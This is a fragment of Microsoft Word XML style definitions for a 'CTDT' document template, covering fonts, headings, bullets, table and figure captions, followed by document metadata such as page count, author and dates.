    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-Bullet2">
    <w:name w:val="CTDT-Bullet2"/>
    <w:basedOn w:val="CTDT-Bullet1"/>
    <w:link w:val="CTDT-Bullet2Char"/>
    <w:qFormat/>
    <w:rsid w:val="0056021B"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-NumberChar">
    <w:name w:val="CTDT-Number Char"/>
    <w:basedOn w:val="CTDT-Bullet1Char"/>
    <w:link w:val="CTDT-Number"/>
    <w:rsid w:val="00260AB5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-H1">
    <w:name w:val="CTDT-H1"/>
    <w:basedOn w:val="CTDT-Text"/>
    <w:link w:val="CTDT-H1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00B03F2E"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:after="360" w:line="264" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-Bullet2Char">
    <w:name w:val="CTDT-Bullet2 Char"/>
    <w:basedOn w:val="CTDT-Bullet1Char"/>
    <w:link w:val="CTDT-Bullet2"/>
    <w:rsid w:val="0056021B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-H2">
    <w:name w:val="CTDT-H2"/>
    <w:basedOn w:val="CTDT-H1"/>
    <w:link w:val="CTDT-H2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00775BC5"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:caps w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-H1Char">
    <w:name w:val="CTDT-H1 Char"/>
    <w:basedOn w:val="CTDT-TextChar"/>
    <w:link w:val="CTDT-H1"/>
    <w:rsid w:val="00B03F2E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:caps/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-H3">
    <w:name w:val="CTDT-H3"/>
    <w:basedOn w:val="CTDT-H2"/>
    <w:link w:val="CTDT-H3Char"/>
    <w:qFormat/>
    <w:rsid w:val="001C0245"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
      </w:numPr>
      <w:spacing w:line="288" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-H2Char">
    <w:name w:val="CTDT-H2 Char"/>
    <w:basedOn w:val="CTDT-H1Char"/>
    <w:link w:val="CTDT-H2"/>
    <w:rsid w:val="00775BC5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:caps w:val="0"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-H4">
    <w:name w:val="CTDT-H4"/>
    <w:basedOn w:val="CTDT-H3"/>
    <w:link w:val="CTDT-H4Char"/>
    <w:qFormat/>
    <w:rsid w:val="00A0090A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
      </w:numPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-H3Char">
    <w:name w:val="CTDT-H3 Char"/>
    <w:basedOn w:val="CTDT-H2Char"/>
    <w:link w:val="CTDT-H3"/>
    <w:rsid w:val="001C0245"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:i/>
      <w:caps w:val="0"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-H0">
    <w:name w:val="CTDT-H0"/>
    <w:basedOn w:val="CTDT-H1"/>
    <w:link w:val="CTDT-H0Char"/>
    <w:qFormat/>
    <w:rsid w:val="00EB06E2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-H4Char">
    <w:name w:val="CTDT-H4 Char"/>
    <w:basedOn w:val="CTDT-H3Char"/>
    <w:link w:val="CTDT-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customStyle="1" w:styleId="CTDT-H0Char">
    <w:name w:val="CTDT-H0 Char"/>
    <w:basedOn w:val="CTDT-H1Char"/>
    <w:link w:val="CTDT-H0"/>
    <w:rsid w:val="00EB06E2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:caps/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-CDR">
    <w:name w:val="CTDT-CDR"/>
    <w:basedOn w:val="CTDT-Bullet1"/>
    <w:link w:val="CTDT-CDRChar"/>
    <w:qFormat/>
    <w:rsid w:val="00ED1ADC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:ind w:left="737" w:hanging="397"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-Bang">
    <w:name w:val="CTDT-Bang"/>
    <w:basedOn w:val="CTDT-Number"/>
    <w:link w:val="CTDT-BangChar"/>
    <w:qFormat/>
    <w:rsid w:val="00F31DC8"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-CDRChar">
    <w:name w:val="CTDT-CDR Char"/>
    <w:basedOn w:val="CTDT-Bullet1Char"/>
    <w:link w:val="CTDT-CDR"/>
    <w:rsid w:val="00ED1ADC"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-BangChar">
    <w:name w:val="CTDT-Bang Char"/>
    <w:basedOn w:val="CTDT-NumberChar"/>
    <w:link w:val="CTDT-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706FA7"/>
    <w:pPr>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CTDT-Hinh">
    <w:name w:val="CTDT-Hinh"/>
    <w:basedOn w:val="CTDT-Bang"/>
    <w:next w:val="CTDT-Text"/>
    <w:link w:val="CTDT-HinhChar"/>
    <w:qFormat/>
    <w:rsid w:val="003123A3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-H31">
    <w:name w:val="CTDT-H3.1"/>
    <w:basedOn w:val="CTDT-H3"/>
    <w:link w:val="CTDT-H31Char"/>
    <w:qFormat/>
    <w:rsid w:val="00325061"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:spacing w:before="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-HinhChar">
    <w:name w:val="CTDT-Hinh Char"/>
    <w:basedOn w:val="CTDT-BangChar"/>
    <w:link w:val="CTDT-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CTDT-H31Char">
    <w:name w:val="CTDT-H3.1 Char"/>
    <w:basedOn w:val="CTDT-H3Char"/>
    <w:link w:val="CTDT-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CTDT-H30">
    <w:name w:val="CTDT-H3.0"/>
    <w:basedOn w:val="CTDT-H3"/>
    <w:next w:val="CTDT-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CTDT-NumerRef">
    <w:name w:val="CTDT-NumerRef"/>
    <w:basedOn w:val="CTDT-Number"/>
    <w:qFormat/>
    <w:rsid w:val="00490B98"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:ind w:left="397" w:hanging="397"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-Text-H1-Desc">
    <w:name w:val="CTDT-Text-H1-Desc"/>
    <w:basedOn w:val="CTDT-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styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00635D1E"/>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1.wdp"/><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2.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13</Pages>
  <Words>1835</Words>
  <Characters>10462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Dau Hoang</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2024-01-16T03:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-12T09:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-02T09:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>